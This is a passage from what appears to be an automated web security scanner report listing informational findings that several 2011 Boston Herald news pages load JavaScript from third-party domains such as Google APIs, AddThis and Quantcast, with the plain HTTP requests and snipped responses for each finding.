Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.675. http://www.bostonherald.com/news/police_logs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/police_logs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/police_logs/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.676. http://www.bostonherald.com/news/politics/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/politics/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:26:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.677. http://www.bostonherald.com/news/politics/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/politics/view.bg?articleid=1312665&srvc=home&position=comment HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.678. http://www.bostonherald.com/news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:24:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.679. http://www.bostonherald.com/news/politics/view/20110127mass_house_members_getting_committee_assignments/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110127mass_house_members_getting_committee_assignments/

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110127mass_house_members_getting_committee_assignments/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:26:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.680. http://www.bostonherald.com/news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.681. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.682. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
